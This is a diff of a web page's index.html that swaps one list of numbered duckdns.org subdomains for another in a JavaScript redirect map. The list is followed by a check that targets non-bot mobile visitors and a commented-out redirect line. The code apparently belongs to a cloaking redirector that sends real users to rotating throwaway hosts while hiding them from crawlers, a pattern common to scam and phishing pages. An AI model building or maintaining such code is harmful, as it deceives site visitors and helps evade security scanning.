--- a/index.html
+++ b/index.html
@@ -270,36 +270,26 @@
 
 
             var links = {
-                "ACC01": "https://154551220860.duckdns.org",
-                "ACC02": "https://154551220861.duckdns.org",
-                "ACC03": "https://154551220862.duckdns.org",
-                "ACC04": "https://154551220863.duckdns.org",
-                "ACC05": "https://154551220864.duckdns.org",
-                "ACC06": "https://154551220865.duckdns.org",
-                "ACC07": "https://154551220866.duckdns.org",
-                "ACC08": "https://154551220867.duckdns.org",
-                "ACC09": "https://154551220868.duckdns.org",
-                "ACC10": "https://154551220869.duckdns.org",
-                "OON01": "https://74476765776871.duckdns.org",
-                "OON02": "https://74476765776872.duckdns.org",
-                "OON03": "https://74476765776873.duckdns.org",
-                "OON04": "https://74476765776874.duckdns.org",
-                "OON05": "https://74476765776875.duckdns.org",
-                "OON06": "https://74476765776876.duckdns.org",
-                "OON07": "https://74476765776877.duckdns.org",
-                "OON08": "https://74476765776878.duckdns.org",
-                "OON09": "https://74476765776879.duckdns.org",
-                "OON10": "https://74476765776880.duckdns.org",
-                "OON11": "https://74476765776881.duckdns.org",
-                "OON12": "https://74476765776882.duckdns.org",
-                "OON13": "https://74476765776883.duckdns.org",
-                "OON14": "https://74476765776884.duckdns.org",
-                "OON15": "https://74476765776885.duckdns.org",
-                "OON16": "https://74476765776886.duckdns.org",
-                "OON17": "https://74476765776887.duckdns.org",
-                "OON18": "https://74476765776888.duckdns.org",
-                "OON19": "https://74476765776889.duckdns.org",
-                "OON20": "https://74476765776890.duckdns.org",
+		"Active01": "https://154551220900.duckdns.org",
+                "Active02": "https://154551220901.duckdns.org",
+                "Active03": "https://154551220902.duckdns.org",
+                "Active04": "https://154551220903.duckdns.org",
+                "Active05": "https://154551220904.duckdns.org",
+                "Active06": "https://154551220905.duckdns.org",
+                "Active07": "https://154551220906.duckdns.org",
+                "Active08": "https://154551220907.duckdns.org",
+                "Active09": "https://154551220908.duckdns.org",
+                "Active10": "https://154551220909.duckdns.org",
+		"Active11": "https://324325369511.duckdns.org",
+                "Active12": "https://324325369512.duckdns.org",
+                "Active13": "https://324325369513.duckdns.org",
+                "Active14": "https://324325369514.duckdns.org",
+                "Active15": "https://324325369515.duckdns.org",
+                "Active16": "https://324325369516.duckdns.org",
+                "Active17": "https://324325369517.duckdns.org",
+                "Active18": "https://324325369518.duckdns.org",
+                "Active19": "https://324325369519.duckdns.org",
+                "Active20": "https://324325369520.duckdns.org",
             };
             if (!is_bot && is_MIbile) {
                 //window.location.href = links[code];
